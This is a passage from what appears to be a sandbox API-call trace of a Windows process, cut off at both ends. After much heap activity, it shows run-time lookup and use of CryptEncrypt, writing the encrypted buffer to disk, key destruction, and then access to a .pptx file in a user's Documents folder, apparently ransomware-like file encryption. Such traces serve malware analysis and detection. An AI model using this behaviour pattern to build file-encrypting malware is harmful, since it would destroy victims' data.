(HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0079.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0079.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0079.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0079.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0079.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0079.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797088 [0079.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2848 [0079.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0079.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0079.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0079.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0079.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0079.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0079.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0079.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0079.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0079.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0079.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0079.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0079.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ea8 [0079.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e28a8 [0079.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0079.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0079.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0079.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0079.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e28a8 | out: hHeap=0x1780000) returned 1 [0079.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0079.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0079.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0170 | out: hHeap=0x1780000) returned 1 [0079.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0079.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0079.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0079.206] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0079.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0079.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0079.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0079.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0079.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0079.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0079.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0079.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0079.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0079.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0079.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0079.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0079.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0079.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0079.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0079.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0079.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0079.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0079.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0079.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0079.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0079.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0079.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0079.207] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0079.207] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1797028, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0079.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0079.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0079.208] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0079.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0079.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0079.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0079.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0079.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0079.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0079.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0079.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0079.208] CryptGetKeyParam (in: hKey=0x41abfc0, dwParam=0x7, pbData=0x43e2860, pdwDataLen=0x144e008, dwFlags=0x0 | out: pbData=0x43e2860*=0x6610, pdwDataLen=0x144e008*=0x4) returned 1 [0079.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0079.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0079.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0079.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0079.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0079.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0079.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0079.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0079.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0079.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0079.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0079.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0079.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0079.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0079.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0079.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0079.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0079.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0079.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0079.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0079.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0079.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0079.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0079.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0079.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0079.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0079.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0079.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0079.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0079.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0079.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0079.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0079.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0079.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0079.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0079.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0079.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0079.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0079.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0079.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0079.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0079.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2848 | out: hHeap=0x1780000) returned 1 [0079.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0079.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0079.209] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0079.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0079.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0079.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0079.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0079.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0079.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0079.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0079.210] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0079.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0079.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea508 | out: hHeap=0x1780000) returned 1 [0079.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0079.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0079.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0079.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0079.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e90 | out: hHeap=0x1780000) returned 1 [0079.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0079.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0079.210] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0079.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0079.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0079.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0079.210] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0079.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0079.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0079.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0079.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0079.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0079.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0079.210] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0079.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0079.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0079.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0079.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0079.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0079.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0079.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0079.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0079.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac000 | out: hHeap=0x1780000) returned 1 [0079.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0079.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0079.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0079.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0079.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0079.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0079.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0079.211] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0079.211] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0079.211] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0079.211] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0079.211] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.211] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.211] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0079.212] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cadf0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0079.212] CryptEncrypt (in: hKey=0x41abfc0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e538*=0xb11b, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e538*=0xb120) returned 1 [0079.212] CharLowerBuffW (in: lpsz="byte[45345]", cchLength=0xb | out: lpsz="byte[45345]") returned 0xb [0079.212] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.212] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.212] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0079.212] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cb0d8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0079.212] CryptEncrypt (in: hKey=0x41abfc0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x49bb380*, pdwDataLen=0x144e538*=0xb11b, dwBufLen=0xb120 | out: pbData=0x49bb380*, pdwDataLen=0x144e538*=0xb120) returned 1 [0079.212] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0079.212] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0079.212] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0079.213] WriteFile (in: hFile=0x298, lpBuffer=0x499a008*, nNumberOfBytesToWrite=0xb120, lpNumberOfBytesWritten=0x144ef3c, lpOverlapped=0x0 | out: lpBuffer=0x499a008*, lpNumberOfBytesWritten=0x144ef3c*=0xb120, lpOverlapped=0x0) returned 1 [0079.215] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0079.215] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.215] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.215] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0079.215] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43cabe0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0079.215] CryptDestroyKey (hKey=0x41abfc0) returned 1 [0079.215] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0079.216] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0079.216] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0079.259] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0079.259] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0079.259] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0079.259] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.259] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0079.259] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.259] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0079.260] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796fe8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0079.260] CryptReleaseContext (hProv=0x41a49d0, dwFlags=0x0) returned 1 [0079.260] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.260] FreeLibrary (hLibModule=0x756e0000) returned 1 [0079.260] CloseHandle (hObject=0x258) returned 1 [0079.260] CloseHandle (hObject=0x298) returned 1 [0079.287] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\g_XT5mjGuHk8Nmh4F.pptx", nBufferLength=0x7fff, lpBuffer=0x143ef38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\g_XT5mjGuHk8Nmh4F.pptx", lpFilePart=0x0) returned 0x37 [0079.287] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\g_XT5mjGuHk8Nmh4F.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\g_xt5mjguhk8nmh4f.pptx")) returned 0x20 [0079.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0079.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0079.287] RtlAllocateHeap (HeapHandle=0x1780000, 